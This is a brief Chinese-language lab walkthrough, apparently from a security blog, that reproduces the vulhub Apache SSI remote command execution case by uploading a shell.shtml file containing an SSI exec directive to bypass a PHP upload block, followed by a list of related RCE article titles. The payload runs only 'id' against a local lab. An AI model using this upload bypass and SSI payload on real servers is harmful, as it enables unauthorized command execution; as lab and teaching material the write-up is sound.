Apache SSI 遠端命令執行漏洞
一、概述
在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了SSI與CGI支援,我們可以上傳一個shtml檔案,並利用<!--#exec cmd="id" -->語法執行任意命令。
參考:
https://vulhub.org/#/environments/httpd/ssi-rce/
二、漏洞環境
路徑:vulhub/httpd/ssi-rce
啟動一個支援SSI與CGI的Apache伺服器:docker-compose up -d
訪問http://192.168.220.139:8080/upload.php,就可以看到一個上傳表單:
三、漏洞復現
正常上傳PHP檔案是不允許的,我們可以上傳一個shell.shtml檔案:
shell.shtml檔案內容如下:
<!--#exec cmd="id" -->
訪問shell.shtml,可見命令已成功執行:
相關文章
- Apache Log4j2遠端命令執行漏洞Apache
- PHPMailer遠端命令執行漏洞復現PHPAI
- Apache Struts 再曝高危遠端程式碼執行漏洞Apache
- 遠端執行命令
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- Apache log4j2 遠端程式碼執行漏洞復現?Apache
- Apache Solr應用伺服器存在遠端程式碼執行漏洞?ApacheSolr伺服器
- ThinkPHP遠端程式碼執行漏洞PHP
- phpunit 遠端程式碼執行漏洞PHP
- 高危漏洞!Apache Log4j 遠端程式碼執行漏洞(附修復建議)Apache
- Apache OFBiz遠端程式碼執行漏洞(CVE-2024-38856)Apache
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- CVE-2017-8464 遠端命令執行漏洞復現
- CVE-2017-8464遠端命令執行漏洞復現
- Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現Apache
- Joomla遠端程式碼執行漏洞分析OOM
- OpenWRT 曝遠端程式碼執行漏洞
- CVE-2020-17530——Apache Struts遠端程式碼執行漏洞Apache
- 最新漏洞:Spring Framework遠端程式碼執行漏洞SpringFramework
- RCE(遠端程式碼執行漏洞)原理及漏洞利用
- 靶機練習---通達OA,遠端命令執行漏洞復現
- Go實現ssh執行遠端命令及遠端終端Go
- 【核彈級漏洞】關於Apache Log4j 2遠端程式碼執行漏洞風險提示Apache
- 什麼是遠端程式碼執行漏洞?
- ThinkPHP 5.0.23 遠端程式碼執行漏洞PHP
- Saltstack系列2:Saltstack遠端執行命令
- Windows命令遠端執行工具WinexeWindows
- Discuz! X系列遠端程式碼執行漏洞分析
- .NET Remoting 遠端程式碼執行漏洞探究REM
- crash_for_windows_pkg遠端程式碼執行漏洞Windows
- WindowsJScript元件曝遠端程式碼執行漏洞WindowsJS元件
- PHP CGI Windows下遠端程式碼執行漏洞PHPWindows
- log4j遠端程式碼執行漏洞
- 命令執行漏洞
- Oracle WebLogic 曝 0day 漏洞,攻擊者可遠端執行命令OracleWeb
- Weblogic修復"Java反序列化"過程遠端命令執行漏洞WebJava
- Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現Apachenamespace